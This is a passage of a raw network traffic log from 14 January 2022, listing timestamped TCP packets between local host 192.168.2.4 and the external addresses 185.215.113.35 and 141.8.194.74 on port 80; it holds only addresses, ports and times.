Jan 14, 2022 00:16:08.422023058 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.422107935 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.422202110 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.422286034 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.422380924 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.422465086 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.422558069 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.422643900 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.422739029 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.422822952 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.422919035 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.423000097 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.423110008 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.423217058 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.423316002 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.423396111 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.423491001 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.423577070 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.423670053 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.423754930 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.423850060 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.423930883 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.424027920 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.424124956 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.424206972 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.424308062 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.424392939 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.424488068 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.424568892 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.424666882 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.424751997 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.424844980 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.424926043 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.425024033 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.425106049 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.425201893 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.425515890 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.425640106 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.425736904 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.425836086 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.425925016 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.426028013 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.426122904 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.426232100 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.426316023 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.426417112 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.426717043 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.426820993 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.426918983 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.427001953 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.427098989 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.427181959 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.427318096 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.427426100 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.427516937 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.433916092 CET	80	49905	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:08.434020996 CET	49905	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:08.434098959 CET	49905	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:08.445013046 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.445240021 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.445331097 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.445436001 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.445530891 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.445617914 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.445709944 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.445804119 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.445890903 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.445980072 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.446074009 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.446161032 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.446280956 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.446367025 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.446446896 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.446526051 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.446613073 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.446697950 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.446777105 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.446863890 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.446948051 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.447032928 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.447119951 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.447204113 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.447449923 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.447552919 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.447653055 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.447735071 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.447834015 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.447917938 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.448018074 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.448095083 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.448193073 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.448276043 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.448374987 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.448457956 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.448553085 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.448637962 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.448735952 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.448822975 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.448910952 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.448998928 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.449093103 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.449173927 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.449275017 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.449356079 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.449455023 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.449536085 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.449636936 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.449713945 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.449815035 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.449898958 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.449995041 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.450100899 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.450202942 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.450285912 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.450390100 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.450506926 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.450606108 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.450684071 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.450783014 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.450862885 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.450963020 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.451045990 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.451142073 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.451221943 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.451322079 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.451416016 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.451504946 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.451587915 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.451682091 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.451766968 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.451855898 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.451942921 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.452043056 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.452136993 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.452222109 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.452359915 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.452461004 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.452625990 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.452730894 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.452816963 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.452909946 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.452997923 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.453087091 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.453174114 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.453269958 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.453356981 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.453448057 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.453538895 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.453625917 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.453711987 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.453824043 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.453901052 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.453984022 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.454085112 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.454171896 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.454272985 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.454350948 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.454446077 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.454524994 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.454626083 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.454706907 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.454804897 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.454885006 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.462955952 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.463123083 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.463213921 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.463308096 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.463395119 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.463478088 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.463566065 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.463648081 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.463736057 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.463814020 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.463838100 CET	80	49902	185.215.113.35	192.168.2.4
Jan 14, 2022 00:16:08.463922977 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.464009047 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.464098930 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.464142084 CET	80	49904	185.215.113.35	192.168.2.4
Jan 14, 2022 00:16:08.464179039 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.464292049 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.464380980 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.464463949 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.464545012 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.464633942 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.464715004 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.464801073 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.464884043 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.464965105 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.465071917 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.465162039 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.465264082 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.465385914 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.465496063 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.465579033 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.465665102 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.465749025 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.465835094 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.465926886 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.466006041 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.466088057 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.466181040 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.466268063 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.466356993 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.466435909 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.466521978 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.466604948 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.466689110 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.466778040 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.466861963 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.466942072 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.467029095 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.467108011 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.467199087 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.467295885 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.467390060 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.467469931 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.467560053 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.467642069 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.467725992 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.467812061 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.467897892 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.467976093 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.468066931 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.468147039 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.468236923 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.468331099 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.468424082 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.468501091 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.468585968 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.468667984 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.468761921 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.468853951 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.468934059 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.469010115 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.469099998 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.469182014 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.469749928 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.469882011 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.469974041 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.470068932 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.470155001 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.470247030 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.470340014 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.470436096 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.470518112 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.470612049 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.470698118 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.470788956 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.470880032 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.470971107 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.471106052 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.471200943 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.471290112 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.471381903 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.471471071 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.471560001 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.471646070 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.471744061 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.471820116 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.471915007 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.472002029 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.472098112 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.472183943 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.472296953 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.472379923 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.472474098 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.472560883 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.478976011 CET	80	49902	185.215.113.35	192.168.2.4
Jan 14, 2022 00:16:08.479111910 CET	80	49902	185.215.113.35	192.168.2.4
Jan 14, 2022 00:16:08.482893944 CET	80	49902	185.215.113.35	192.168.2.4
Jan 14, 2022 00:16:08.488950968 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.489242077 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.489444017 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.498791933 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.498878002 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.498974085 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.499056101 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.499140978 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.499226093 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.499320984 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.499408007 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.499486923 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.499579906 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.499663115 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.499778986 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.499901056 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.499998093 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.500101089 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.500176907 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.500283003 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.500370979 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.500468969 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.500550985 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.500646114 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.500732899 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.500823975 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.500915051 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.501013994 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.501097918 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.501187086 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.501307011 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.501391888 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.501497030 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.501585007 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.501667976 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.501751900 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.501837969 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.501923084 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.502007961 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.502120972 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.502217054 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.502481937 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.502573013 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.502662897 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.502754927 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.502840996 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.502931118 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.503026009 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.503127098 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.503211975 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.503330946 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.503415108 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.503498077 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.503609896 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.503700972 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.503803968 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.503927946 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.504074097 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.504170895 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.505327940 CET	80	49905	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:08.506304979 CET	80	49905	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:08.506345987 CET	80	49905	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:08.506386042 CET	80	49905	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:08.506422997 CET	49905	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:08.506427050 CET	80	49905	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:08.506464958 CET	80	49905	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:08.506504059 CET	80	49905	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:08.506532907 CET	49905	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:08.506542921 CET	80	49905	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:08.506580114 CET	80	49905	141.8.194.74	192.168.2.4
